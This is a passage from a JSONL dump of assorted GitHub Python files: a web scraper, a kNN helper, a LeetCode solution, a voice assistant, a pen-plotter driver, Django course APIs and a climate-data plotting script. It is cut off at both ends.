resultsfile.write(str(result))\n\nprint('done')","repo_name":"maccergit/Rosalind","sub_path":"Algorithmic Heights - MER/MER/003.py","file_name":"003.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24086730725","text":"import requests\nimport re\n\ndef get_info():\n r = requests.get('https://habr.com/')\n return r.text\n\n\nif __name__ == '__main__':\n text = get_info()\n\n name_pattern = '\"https:.*/\"'\n links = re.findall(name_pattern, text)\n print(len(links))\n for item in links:\n print(item + '\\n')","repo_name":"foxrec123/Python","sub_path":"9/reg_express.py","file_name":"reg_express.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31526560516","text":"import torch\n\n\n# code from here:\n# https://colab.research.google.com/github/facebookresearch/moco/blob/colab-notebook/colab/moco_cifar10_demo.ipynb\n#\n# knn monitor as in InstDisc https://arxiv.org/abs/1805.01978\n# implementation follows http://github.com/zhirongw/lemniscate.pytorch and https://github.com/leftthomas/SimCLR\n\ndef knn_predict(feature, feature_bank, feature_labels, classes: int, knn_k: int, knn_t: float):\n \"\"\"Helper method to run kNN predictions on features based on a feature bank\n\n Args:\n feature: Tensor of shape [N, D] consisting of N D-dimensional features\n feature_bank: Tensor of a database of features used for kNN\n feature_labels: Labels for the features in our feature_bank\n classes: Number of classes (e.g. 10 for CIFAR-10)\n knn_k: Number of k neighbors used for kNN\n knn_t: \n\n \"\"\"\n\n # compute cos similarity between each feature vector and feature bank ---> [B, N]\n sim_matrix = torch.mm(feature, feature_bank)\n # [B, K]\n sim_weight, sim_indices = sim_matrix.topk(k=knn_k, dim=-1)\n # [B, K]\n sim_labels = torch.gather(feature_labels.expand(feature.size(0), -1), dim=-1, index=sim_indices)\n\n # we do a reweighting of the similarities \n sim_weight = (sim_weight / knn_t).exp()\n\n # counts for each class\n one_hot_label = torch.zeros(feature.size(0) * knn_k, classes, device=sim_labels.device)\n # [B*K, C]\n one_hot_label = one_hot_label.scatter(dim=-1, index=sim_labels.view(-1, 1), value=1.0)\n # weighted score ---> [B, C]\n pred_scores = torch.sum(one_hot_label.view(feature.size(0), -1, classes) * sim_weight.unsqueeze(dim=-1), dim=1)\n\n pred_labels = pred_scores.argsort(dim=-1, descending=True)\n\n return pred_labels","repo_name":"huang-research-group/contrastive2021","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"99"} +{"seq_id":"26531903014","text":"'''Instructions\nGiven a 2D matrix matrix, handle multiple queries of the following type:\n\nCalculate the sum of the elements of matrix inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).\nImplement the NumMatrix class:\n\nNumMatrix(int[][] matrix) Initializes the object with the integer matrix matrix.\nint sumRegion(int row1, int col1, int row2, int col2) Returns the sum of the elements of matrix inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).\n'''\n'''Examples\nInput\n[\"NumMatrix\", \"sumRegion\", \"sumRegion\", \"sumRegion\"]\n[[[[3, 0, 1, 4, 2], [5, 6, 3, 2, 1], [1, 2, 0, 1, 5], [4, 1, 0, 1, 7], [1, 0, 3, 0, 5]]], [2, 1, 4, 3], [1, 1, 2, 2], [1, 2, 2, 4]]\nOutput\n[null, 8, 11, 12]\n\nExplanation\nNumMatrix numMatrix = new NumMatrix([[3, 0, 1, 4, 2], [5, 6, 3, 2, 1], [1, 2, 0, 1, 5], [4, 1, 0, 1, 7], [1, 0, 3, 0, 5]]);\nnumMatrix.sumRegion(2, 1, 4, 3); // return 8 (i.e sum of the red rectangle)\nnumMatrix.sumRegion(1, 1, 2, 2); // return 11 (i.e sum of the green rectangle)\nnumMatrix.sumRegion(1, 2, 2, 4); // return 12 (i.e sum of the blue rectangle)\n'''\n'''Thoughts\n1. For init loop through matrix\n2. For every list in matrix loop through it\n3. For every element add the total of everything in this list until this elemtn to a list\n4. For sumRegion get sums from row1 to row2\n5. loop through the current list minus sums[col1] from sums[col2+1] and add it to the total\n6. Return total\n'''\n\nclass NumMatrix:\n def __init__(self, matrix: list[list[int]]) -> None:\n r, c = len(matrix), len(matrix[0])\n sums = [[0 for _ in range(c+1)] for _ in range(r)]\n for i in range(r):\n for j in range(c):\n sums[i][j+1] = sums[i][j] + matrix[i][j]\n self.sums = sums\n \n\n def sumRegion(self, row1, col1, row2, col2):\n out = 0\n current = self.sums[row1:row2+1]\n for l in current:\n out += l[col2+1] - l[col1]\n return out\n\n # def __init__(self, matrix: list[list[int]]) -> None:\n # self.matrix = matrix\n\n # def sumRegion(self, row1, col1, row2, col2):\n # out = 0\n # current = self.matrix[row1:row2+1]\n # for i in range(len(current)):\n # current[i] = current[i][col1:col2+1]\n # out += sum(current[i])\n # return out\n\n # def sumRegion(self, row1, col1, row2, col2):\n # out = 0\n # current = self.matrix[row1:row2+1]\n \n # r, c = len(current), len(current[0])\n # sums = [[0 for _ in range(c+1)] for _ in range(r)]\n\n # for i in range(r):\n # for j in range(col2+1):\n # sums[i][j+1] = sums[i][j] + current[i][j]\n # out += sums[i][col2+1] - sums[i][col1]\n # return out\n","repo_name":"RL419/computer-science","sub_path":"June Problems/RangeSumQuery2D.py","file_name":"RangeSumQuery2D.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"44181232471","text":"from fastapi import HTTPException, status\n\n\nclass ClaimTypeNotSupportedError(HTTPException):\n \"\"\"Raises internally when claim type is wrong.\"\"\"\n\n def __init__(self, claim_type: str):\n super().__init__(\n status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,\n detail=f\"Claim type '{claim_type}' is not supported\",\n )\n","repo_name":"Skogstomten/produce-exchange-hub","sub_path":"api/app/authentication/errors/claim_type_not_supported_error.py","file_name":"claim_type_not_supported_error.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28674151834","text":"import pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport webbrowser\r\nimport os\r\nimport smtplib\r\n\r\n\r\nengine=pyttsx3.init('sapi5')\r\nvoices=engine.getProperty('voices')\r\n#print(voices[0].id)\r\nengine.setProperty('voice',voices[0].id)\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\ndef WishMe():\r\n hour=int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<=12:\r\n speak(\"goodmorning..!\")\r\n elif hour>=12 and hour<=18:\r\n speak(\"goodafternoon..!\")\r\n else :\r\n speak (\"good evening\")\r\n speak(\"hey this is aarv ! how may i help you sir\")\r\ndef takecommand():\r\n r=sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print (\"listening....\")\r\n r.pause_threshold=1\r\n audio=r.listen(source)\r\n try:\r\n print(\"recognizing....\")\r\n query=r.recognize_google(audio,language='en-in')\r\n print(f\"user said:{query}\\n\")\r\n except Exception as e:\r\n #print(e)\r\n print('say it again please.....')\r\n return \"None\"\r\n return query\r\ndef sendEmail(to,content):\r\n server=smtplib.SMTP('smtp.gmail.com',587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login(\"rr9002575@gmail.com\",'*******')\r\n server.sendmail(\"rr9002575@gmail.com\",to,content)\r\n server.close()\r\n \r\n\r\nif __name__ == \"__main__\":\r\n#speak(\"hey guys...!this is python freak.........plz do follow\")\r\n WishMe()\r\n while True:\r\n#speak(\"yeah\")\r\n query = takecommand().lower()\r\n#logic for executing task \r\n if 'wikipedia' in query:\r\n speak('searching wikipedia.....')\r\n query=query.replace(\"wikipedia\",\"\")\r\n results=wikipedia.summary(query,sentences=2)\r\n speak(\"according to wikipedia\")\r\n speak(results)\r\n print(results)\r\n break\r\n \r\n elif 'open youtube' in query :\r\n webbrowser.open('youtube.com')\r\n break\r\n elif 'open google' in query :\r\n webbrowser.open('google.com')\r\n break\r\n elif 'stackoverflow' in query :\r\n webbrowser.open('stackoverflow.com')\r\n break\r\n elif 'open gmail' in query :\r\n webbrowser.open('gmail.com')\r\n break\r\n elif 'open gaana' in query :\r\n webbrowser.open('gaana.com')\r\n break\r\n elif 'open spotify' in query :\r\n webbrowser.open('spotify.com')\r\n break\r\n elif 'who are you' in query:\r\n print(\"i am aarv..!how may i help you sir\")\r\n speak('i am aarv..!how may i help you sir')\r\n break\r\n elif 'play song' in query :\r\n music_dir='C:\\\\Users\\\\rr900\\\\Music\\\\New folder'\r\n songs=os.listdir(music_dir)\r\n os.startfile(os.path.join(music_dir,songs[0]))\r\n break\r\n elif 'the time' in query:\r\n strTime=datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n speak(f\"sir,the time is : {strTime}\") \r\n break \r\n elif 'open code' in query:\r\n codePath=\"C:\\\\Users\\\\rr900\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n os.startfile(codePath) \r\n break\r\n elif 'email to rahul' in query:\r\n try:\r\n speak(\"what should i say ?\")\r\n print(\"what should i say ?\")\r\n content=takecommand()\r\n to =('rr9002575@gmail.com')\r\n sendEmail(to,content)\r\n print(\"email has been sent\")\r\n speak(\"email has been sent\")\r\n \r\n except Exception as e:\r\n print(e)\r\n speak(\"fail to sent\")\r\n break\r\n","repo_name":"suman-2110/dekstop-AI","sub_path":"jarvish.py","file_name":"jarvish.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"39584038565","text":"import math\n\nfrom django.contrib.postgres.search import (SearchVector, TrigramSimilarity,\n TrigramWordSimilarity)\nfrom django.core.paginator import Paginator\nfrom django.db.models.functions import Greatest\nfrom moviepy.editor import VideoFileClip\nfrom rest_framework import status\n# from .pagination import PaginationHandlerMixin\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom base.api.serializers import *\nfrom base.models import *\n\nfrom .filters import CourseFilter\nfrom .models import *\nfrom .rating import calculate_weighted_rating\nfrom .serializers import *\n\n\nclass Category_view(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def put(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n serializer = catSerializer(data=request.data)\n\n if serializer.is_valid():\n for i in range(11):\n s = \"Interest\" + str(i + 1)\n if serializer.data[s] == True:\n gettingCategory = interests.objects.get(id=i + 1)\n user.interested.add(gettingCategory)\n else:\n return Response(\n {\"msg\": \"Invalid Entry\"}, status=status.HTTP_400_BAD_REQUEST\n )\n\n serializer = profileSerializer(user, many=False)\n\n return Response(serializer.data)\n\n def get(self, request):\n categories = interests.objects.all()\n serializer = categorySerializer(categories, many=True)\n\n return Response(serializer.data)\n\n\nclass Course_view(APIView):\n def get(self, request):\n data = Course.objects.all()\n data = Course.objects.order_by(\"-weighted_rating\")\n serializer = TopicSerializer(data, many=True)\n return Response(serializer.data)\n\n permission_classes = [\n IsAuthenticated,\n ]\n\n def post(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n if user.is_educator == True:\n all_courses = Course.objects.filter(educator_mail=request.user.id)\n total_weighted_rating = 0.0\n for each_course in all_courses:\n total_weighted_rating += each_course.weighted_rating\n if len(all_courses) == 0:\n avg_weighted_rating = 0\n else:\n avg_weighted_rating = total_weighted_rating / len(all_courses)\n user.educator_rating = avg_weighted_rating\n user.save()\n if avg_weighted_rating >= 2.5:\n user.is_certified_educator = True\n user.save()\n request.POST._mutable = True\n request.data[\"educator_mail\"] = request.user.id\n request.data[\"educator_name\"] = user.name\n request.POST._mutable = False\n serializer = TopicSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data)\n else:\n user.is_certified_educator = False\n user.save()\n request.POST._mutable = True\n request.data[\"educator_mail\"] = request.user.id\n request.data[\"educator_name\"] = user.name\n request.data[\"price\"] = 0\n request.POST._mutable = False\n serializer = TopicSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data)\n else:\n return Response({\"msg\": \"user is not an educator\"})\n\n\nclass View_filtered_courses(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n serializer_class = TopicSerializer\n\n def get(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n user_interested_courses = user.interested.all()\n courses = Course.objects.filter(category__in=user_interested_courses)\n\n courses = Course.objects.order_by(\"-weighted_rating\")\n paginator = PageNumberPagination()\n page = paginator.paginate_queryset(courses, request=request)\n if page is not None:\n serializer = paginator.get_paginated_response(\n self.serializer_class(page, many=True).data\n )\n else:\n serializer = self.serializer_class(courses, many=True)\n\n return Response(serializer.data)\n\n\nclass Course_rating(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def post(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n check_status = 0\n history = feedbackmodel.objects.filter(\n user=user.name, course=request.data.get(\"course\")\n )\n if len(history) != 0:\n check_status = 1\n history.delete()\n request.POST._mutable = True\n request.data[\"sender\"] = user.id\n request.data[\"user\"] = user.name\n request.POST._mutable = False\n seri = GetRatingSerializer(data=request.data)\n if seri.is_valid(raise_exception=True):\n # ck = feedbackmodel.objects.latest('time')\n course_id = request.data.get(\"course\")\n course = Course.objects.get(id=course_id)\n count = course.review_count\n rating = course.rating\n seri.save()\n rating_serializer = RatingSerializer(instance=course, data=request.data)\n if rating_serializer.is_valid(raise_exception=True):\n rating_serializer.save()\n review = course.latest_review\n # return Response(check)\n if count == 0:\n rating_serializer = RatingSerializer(\n instance=course, data=request.data\n )\n if rating_serializer.is_valid(raise_exception=True):\n course.rating = review\n course.review_count = 1\n course.weighted_rating = calculate_weighted_rating(course)\n rating_serializer.save()\n if check_status == 0:\n return Response({\"msg\": \"Thanks for your review\"})\n if check_status == 1:\n return Response(\n {\"msg\": \"Review edited: Thanks for your review\"}\n )\n else:\n present_rating = rating * count\n new_rating = (present_rating + review) / (count + 1)\n if check_status == 0:\n count += 1\n course.review_count = count\n rating_serializer = RatingSerializer(\n instance=course, data=request.data\n )\n if rating_serializer.is_valid(raise_exception=True):\n course.rating = new_rating\n course.weighted_rating = calculate_weighted_rating(course)\n rating_serializer.save()\n if check_status == 0:\n return Response({\"msg\": \"Thanks for your review\"})\n if check_status == 1:\n return Response(\n {\"msg\": \"Review edited: Thanks for your review\"}\n )\n return Response({\"msg\": \"Something went wrong\"})\n # rating_serializer = RatingSerializer(instance = course,data=request.data)\n # if rating_serializer.is_valid(raise_exception=True):\n # rating_serializer.save()\n # return Response(rating)\n return Response({\"msg\": \"enter valid details\"})\n\n def get(self, request, ck):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n feedback = feedbackmodel.objects.filter(course=ck, sender=request.user.id)\n if len(feedback) == 0:\n return Response({\"msg\": \"Not rated\"}, status=status.HTTP_400_BAD_REQUEST)\n feedback_serializer = GetRatingSerializer(instance=feedback, many=True)\n return Response(feedback_serializer.data)\n\n\nclass Searching(APIView):\n def get(self, request):\n queryset = Course.objects.all()\n my_filter = CourseFilter(request.GET, queryset=queryset)\n queryset = my_filter.qs\n\n search_result = request.GET.get(\"search-area\") or \"\"\n if search_result:\n queryset = (\n queryset.annotate(\n similarity=Greatest(\n TrigramWordSimilarity(search_result, \"topic\"),\n TrigramWordSimilarity(search_result, \"educator_name\"),\n )\n )\n .filter(similarity__gt=0.30)\n .order_by(\"-similarity\")\n )\n\n serializer = TopicSerializer(queryset, many=True)\n\n if serializer.data == []:\n return Response(\n {\"msg\": \"Nothing Found\"}, status=status.HTTP_400_BAD_REQUEST\n )\n\n return Response(serializer.data)\n\n\nclass Purchased_courses(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def get(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n array = user.purchasedCourse.all()\n courses = Course.objects.filter(id__in=array)\n topic_serializer = TopicSerializer(courses, many=True)\n return Response(topic_serializer.data)\n\n\nclass Lesson_view(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def get(self, request):\n lesson = lessons.objects.all()\n serializer = lessonSerializer(lesson, many=True)\n\n return Response(serializer.data)\n\n def post(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n topic = request.data.get(\"topic\")\n course = Course.objects.get(id=topic)\n\n if str(course.educator_mail) != str(email):\n return Response({\"msg\": \"invalid\"})\n\n try:\n if user.is_educator == True:\n request.POST._mutable = True\n request.data[\"topic\"] = topic\n request.POST._mutable = False\n serializer = lessonSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n\n return Response({\"msg\": \"lesson added\"})\n return Response({\"msg\": \"user is not an educator\"})\n except:\n return Response({\"msg\": \"invalid\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass View_specific_course_lesson(APIView):\n def post(self, request):\n try:\n topic = request.data.get(\"topic\")\n lesson = lessons.objects.filter(topic=topic)\n serializer = lessonSerializer(lesson, many=True)\n if serializer.data == []:\n return Response(\n {\"msg\": \"No such course exists\"}, status=status.HTTP_400_BAD_REQUEST\n )\n return Response(serializer.data)\n except:\n return Response(\n {\"msg\": \"Enter a valid course\"}, status=status.HTTP_400_BAD_REQUEST\n )\n\n\nclass Course_feedback(APIView):\n def get(self, request, ck):\n course = feedbackmodel.objects.filter(course=ck)\n rating_serializer = GetRatingSerializer(instance=course, many=True)\n return Response(rating_serializer.data)\n","repo_name":"ClawedCatalyst/SkillEdge-Backend","sub_path":"courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"12186985790","text":"from dataclasses import dataclass\nimport logging\nfrom typing import Optional, Union\nimport time\n\nimport serial\n\nfrom gcode_robot.common import Point\nfrom gcode_robot.utils import gcode_reader\nfrom gcode_robot.gcode import GCodeLine, GCodeStatement\n\nlogger = logging.getLogger(__name__)\n\n\nclass MakelangoleRobot:\n IDLE_BYTES = b'> \\n'\n\n @dataclass\n class Settings:\n # General settings\n motor_width_mm: float = 500\n speed_idle: float = 30\n\n # Servo settings\n speed_draw: float = 20\n speed_pen_lift: float = 50\n\n angle_pen_up: float = 90\n angle_pen_down: float = 160\n\n def __init__(self, port: str, baudrate=57600,\n settings: Optional['MakelangoleRobot.Settings'] = None):\n self._serial = serial.Serial()\n self._serial.port = port\n self._serial.baudrate = baudrate\n self._current_settings = settings\n self._home = Point(0, 0)\n\n def _wait_for_idle(self):\n _t = time.time()\n ret = self._serial.read_until(self.IDLE_BYTES)\n logger.debug('Spent {:.2f} ms waiting for idle'.format(time.time() - _t))\n return ret\n\n def _wait_read(self):\n msg = b''\n while not msg:\n msg = self._serial.readline()\n # time.sleep(0.1)\n msg += self._serial.read_until(self.IDLE_BYTES)\n return msg.rstrip(self.IDLE_BYTES)\n\n def _send_gcode(self, line: Union[str, bytes, GCodeLine, GCodeStatement]):\n if isinstance(line, GCodeLine):\n line = line.statement\n if isinstance(line, GCodeStatement):\n line = str(line)\n if type(line) is str:\n line = line.encode()\n if line is None:\n return\n\n if not line.endswith(b'\\n'):\n line += b'\\n'\n\n logger.debug('Sending: {}'.format(line))\n self._serial.write(line)\n\n def init_connection(self):\n if not self._serial.is_open:\n self._serial.open()\n\n welcome_msg = self._wait_read()\n logger.info('Receive welcome message: {}'.format(welcome_msg.decode()))\n\n self.apply_settings()\n\n def apply_settings(self,\n settings: Optional['MakelangoleRobot.Settings'] = None):\n if settings:\n self._current_settings = settings\n\n s = self._current_settings\n if s is None:\n raise\n\n # Report current firmware version\n self._send_gcode('D5')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n # Report all settings\n self._send_gcode('M503')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n self._send_gcode('M17')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n # Change axis A limits to max T and min B\n half_width = self._current_settings.motor_width_mm / 2\n self._send_gcode(f'M101 A0 T{half_width} B{-half_width}')\n self._send_gcode('M101 A1 T464 B-464')\n self._send_gcode('M101 A2 T170 B90')\n\n # TODO Allow home to be configured\n self.make_home(Point(0, -472))\n\n self._send_gcode('M17')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n # Set initial feed rate\n self._send_gcode(f'G00 X0 F{s.speed_idle}')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n def set_home(self, p: Point):\n # Set home\n self._send_gcode(f'D6 {p.gcode}')\n self._home = p\n logger.debug('Received: {}'.format(self._wait_read()))\n\n def make_home(self, p: Point):\n # Teleport\n self._send_gcode(f'G92 {p.gcode}')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n self.set_home(p)\n\n def go_home(self, speed=None):\n if speed is None:\n speed = self._current_settings.speed_idle\n\n # self._send_gcode(f'G28 F{speed}')\n self._send_gcode(f'G00 {str(self._home)} F{speed}')\n\n def run_code_block(self, raw: str):\n\n self._wait_for_idle()\n\n n = 0\n for line in gcode_reader(raw):\n n += 1\n\n if not line.statement:\n continue\n\n logger.debug('Processing line {}'.format(n))\n\n self._send_gcode(line)\n self._wait_for_idle()\n\n def run_file(self, gcode_path: str):\n # Make sure to lift pen\n self._send_gcode(f'G01 Z{self._current_settings.angle_pen_up} F{self._current_settings.speed_pen_lift}')\n\n # Write GCODE\n with open(gcode_path) as f:\n self.run_code_block(f)\n\n # Make sure to lift pen\n self._send_gcode(f'G01 Z{self._current_settings.angle_pen_up} F{self._current_settings.speed_pen_lift}')\n\n # Goto init position\n self.go_home()\n","repo_name":"wenoptics/cnc-polarplotter","sub_path":"sender/gcode_robot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8697453188","text":"from django.urls import path\nimport myapp.views as mv\n\nurlpatterns = [\n path('',mv.index),\n path('read//',mv.read),\n path('update//',mv.update),\n path('create/',mv.create),\n path('delete/',mv.delete)\n]\n","repo_name":"Sim-918/Django_CRUD","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29293731462","text":"from matplotlib import pyplot as plt \nimport cartopy.crs as ccrs\nfrom cartopy.util import add_cyclic_point\nimport cartopy.crs as ccrs\nfrom netCDF4 import Dataset\nimport numpy as np \nimport os\nfrom tqdm import tqdm\n\n\"\"\"\nScript for reproducing images used in Extended Data Figure 1\n\"\"\"\n\nmodels_list = [\n 'ACCESS-CM2',\n 'AWI-CM-1-1-MR',\n 'BCC-CSM2-MR',\n 'CAMS-CSM1-0',\n 'CanESM5-CanOE',\n 'CMCC-CM2-SR5',\n 'CNRM-CM6-1',\n 'CNRM-ESM2-1',\n 'FGOALS-f3-L',\n 'FGOALS-g3',\n 'GFDL-ESM4',\n 'IITM-ESM',\n 'INM-CM4-8',\n 'INM-CM5-0',\n 'IPSL-CM6A-LR',\n 'KACE-1-0-G',\n 'MIROC6',\n 'MPI-ESM1-2-LR',\n 'MRI-ESM2-0',\n 'NorESM2-MM',\n 'TaiESM1',\n 'UKESM1-0-LL'\n ]\n\nshort_scenarios_list = ['ssp245', 'ssp370', 'ssp585']\nvariable_short = 'tas'\n\nROOT_DATA = '../Source_data'\nSIMULATIONS_DIRECTORY = f'{ROOT_DATA}/CMIP6_data/near_surface_air_temperature/Annual_uniform_remapped'\nPATH_BEST_DATA = f'{ROOT_DATA}/BEST_data/BEST_regridded_annual_1979-2022.nc'\n\nwith open('../area_cella.csv', newline='') as csvfile:\n area_cella = np.genfromtxt(csvfile, delimiter=',')\n\nn_BEST_datasets_per_model_scenario = 5\n\nstart_year_training = 1979\nend_year_training = 2022\nn_training_years = end_year_training-start_year_training+1\n\nstart_year_test = end_year_training+1\nend_year_test = 2098\nn_test_years = end_year_test-start_year_test+1\n\n\"\"\" Load DNNs predictions \"\"\"\npredictions = np.zeros((n_BEST_datasets_per_model_scenario, len(models_list), len(short_scenarios_list), n_training_years+n_test_years, 64, 128))\nfor model_idx, model in tqdm(enumerate(models_list), total=len(models_list)):\n for scenario_idx, scenario_short in enumerate(short_scenarios_list):\n for i in range(5):\n TRAIN_SET_PREDICTIONS_DIRECTORY = f'{ROOT_DATA}/Transfer_Learning_on_Observations/Training_set_predictions/tas_{model}_{scenario_short}_{i+1}'\n TEST_SET_PREDICTIONS_DIRECTORY = f'{ROOT_DATA}/Transfer_Learning_on_Observations/Test_set_predictions/tas_{model}_{scenario_short}_{i+1}'\n # Training set predictions\n model_train_set_predictions_filenames_list = os.listdir(TRAIN_SET_PREDICTIONS_DIRECTORY)\n model_train_set_predictions_filenames_list = [fn for fn in model_train_set_predictions_filenames_list if (fn.endswith('.csv'))]\n model_train_set_predictions_filenames_list.sort()\n model_train_set_prediction_array = np.zeros((n_training_years, 64, 128))\n for mp_idx, mp_filename in enumerate(model_train_set_predictions_filenames_list):\n if (not mp_filename.endswith('.csv')):\n continue\n file = open(f'{TRAIN_SET_PREDICTIONS_DIRECTORY}/{mp_filename}')\n model_train_set_prediction_array[mp_idx,:,:] = np.loadtxt(file, delimiter=',')\n predictions[i,model_idx,scenario_idx,:n_training_years,:,:] = model_train_set_prediction_array\n # Test set predictions\n model_test_set_predictions_filenames_list = os.listdir(TEST_SET_PREDICTIONS_DIRECTORY)\n model_test_set_predictions_filenames_list = [fn for fn in model_test_set_predictions_filenames_list if (fn.endswith('.csv'))]\n model_test_set_predictions_filenames_list.sort()\n model_test_set_prediction_array = np.zeros((n_test_years, 64, 128))\n for mp_idx, mp_filename in enumerate(model_test_set_predictions_filenames_list):\n if (not mp_filename.endswith('.csv')):\n continue\n file = open(f'{TEST_SET_PREDICTIONS_DIRECTORY}/{mp_filename}')\n model_test_set_prediction_array[mp_idx,:,:] = np.loadtxt(file, delimiter=',')\n predictions[i,model_idx,scenario_idx,n_training_years:,:,:] = model_test_set_prediction_array[:,:,:]\n\n\"\"\" Load CMIP6 ESMs simulations\"\"\"\nsimulation_array = np.zeros((len(models_list), len(short_scenarios_list), 2098-1850+1, 64, 128))\nfor model_idx, model in tqdm(enumerate(models_list), total=len(models_list)):\n for scenario_idx, scenario_short in enumerate(short_scenarios_list):\n simulations_files_list = os.listdir(SIMULATIONS_DIRECTORY)\n simulations_files_list.sort()\n matching_simulations = [simulation_file for simulation_file in simulations_files_list if ((model in simulation_file and 'historical' in simulation_file)\n or (model in simulation_file and scenario_short in simulation_file))]\n # maching_simuations[0] is the historical and matching_simulations[1] is the SSP simulation because of the sort operation\n # (for each model, the first simulation is the historical and then the SSP)\n nc_historical_data = Dataset(f'{SIMULATIONS_DIRECTORY}/{matching_simulations[0]}', mode='r+', format='NETCDF3_CLASSIC')\n nc_ssp_data = Dataset(f'{SIMULATIONS_DIRECTORY}/{matching_simulations[1]}', mode='r+', format='NETCDF3_CLASSIC')\n n_historical_years = nc_historical_data[variable_short].shape[0]\n n_ssp_years = nc_ssp_data[variable_short].shape[0]\n n_lats = nc_ssp_data['lat'].shape[0]\n n_lons = nc_ssp_data['lon'].shape[0]\n simulation_array[model_idx,scenario_idx,:n_historical_years] = nc_historical_data[variable_short][:]\n if (n_ssp_years == 86):\n simulation_array[model_idx,scenario_idx,n_historical_years:] = nc_ssp_data[variable_short][:-2]\n elif (n_ssp_years == 85):\n simulation_array[model_idx,scenario_idx,n_historical_years:] = nc_ssp_data[variable_short][:-1]\n elif (n_ssp_years == 84):\n simulation_array[model_idx,scenario_idx,n_historical_years:] = nc_ssp_data[variable_short][:]\n nc_historical_data.close()\n nc_ssp_data.close()\n\nnc_BEST_data = Dataset(PATH_BEST_DATA, mode='r+', format='NETCDF3_CLASSIC')\n\n\"\"\" Loada BEST observational data \"\"\"\nn_BEST_years = nc_BEST_data['st'].shape[0]\nn_lats = nc_BEST_data['lat'].shape[0]\nn_lons = nc_BEST_data['lon'].shape[0]\nlats = np.ma.getdata(nc_BEST_data['lat'][:])\nlons = np.ma.getdata(nc_BEST_data['lon'][:])\nBEST_data_array = np.zeros((n_BEST_years, n_lats, n_lons))\nBEST_data_array[:,:,:] = nc_BEST_data['st'][:,:,:]\nnc_BEST_data.close()\n\n# Compute average surface air temperature maps across DNNs predictions and CMIP6 ESMs simulations\navg_predictions_maps = np.mean(predictions, axis=(0,1))\navg_simulations_maps = np.mean(simulation_array, axis=0)\n\n# Compute average surface air temperature maps in 2081-2098\navg_predictions_maps_2081_2098 = np.mean(avg_predictions_maps[:,2081-1979:,:,:], axis=1)\navg_simulations_maps_2081_2098 = np.mean(avg_simulations_maps[:,2081-1850:,:,:], axis=1)\n\n# Compute average BEST map in 1980-1990 that will be used as baseline\nBEST_baseline_map_1980_1990 = np.mean(BEST_data_array[1:1990-1979+1,:,:], axis=0)\n\n# Compute avg warming maps in 2081-2098 wrt 1980-1990\nprediction_warming = avg_predictions_maps_2081_2098 - BEST_baseline_map_1980_1990\nsimulation_warming = avg_simulations_maps_2081_2098 - BEST_baseline_map_1980_1990\n\narea_cella_sum_over_lon = np.sum(area_cella, axis=1)\n\n# Compute avg warming values across latitudes\npredictions_means_over_lons = ((prediction_warming * area_cella).sum(axis=(2)))/area_cella_sum_over_lon\nsimulations_means_over_lons = ((simulation_warming * area_cella).sum(axis=(2)))/area_cella_sum_over_lon\n\n\"\"\" Plot \"\"\"\nfont = 